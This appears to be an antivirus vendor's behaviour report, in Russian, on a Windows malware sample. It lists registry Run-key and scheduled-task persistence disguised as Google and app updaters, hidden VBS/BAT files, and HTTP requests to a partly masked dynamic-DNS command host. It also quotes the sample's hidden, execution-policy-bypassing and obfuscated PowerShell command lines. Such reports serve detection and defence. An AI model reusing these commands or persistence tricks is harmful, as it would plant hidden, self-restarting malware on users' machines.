Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'GoogleUpdateTaskMachineAUAU' = 'C:\Users\Public\Libraries\P4.vbs'
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\automaticappupdaterauxaux
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\libraries\p4.vbs
- C:\users\public\libraries\p4c.vbs
- C:\users\public\libraries\p4.bat
Присваивает атрибут 'скрытый' для следующих файлов
- C:\users\public\libraries\p4.vbs
- C:\users\public\libraries\p4.bat
- C:\users\public\libraries\p4c.vbs
Сетевая активность
TCP
Запросы HTTP GET
- http://ka######ylab.ignorelist.com/news.php
UDP
- DNS ASK ka######ylab.ignorelist.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\Libraries\P4.vbs"
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\Libraries\P4c.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c Invoke-Command -ScriptBlock { schtasks /create /TN AutomaticAppUpdaterAUXAUX /TR 'C:\Users\Public\Libraries\P4.vbs' /SC minute...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -winDOw hIDDEn -NONInTeRACtivE -Noexi -exECuTIoNpOliCY BypAss -NoPr " ${LQ`x`JC} =[TyPe](\"{11}{3}{4}{12}{15}{1}{10}{7}{9}{6}{5}{13}{0}{14}{8}{2}\" -F'YSTem','riC','Ect','ECt','io','tR...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C C:\Users\Public\Libraries\P4.bat' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C C:\Users\Public\Libraries\P4.bat
- '<SYSTEM32>\schtasks.exe' /create /TN AutomaticAppUpdaterAUXAUX /TR C:\Users\Public\Libraries\P4.vbs /SC minute /mo 60
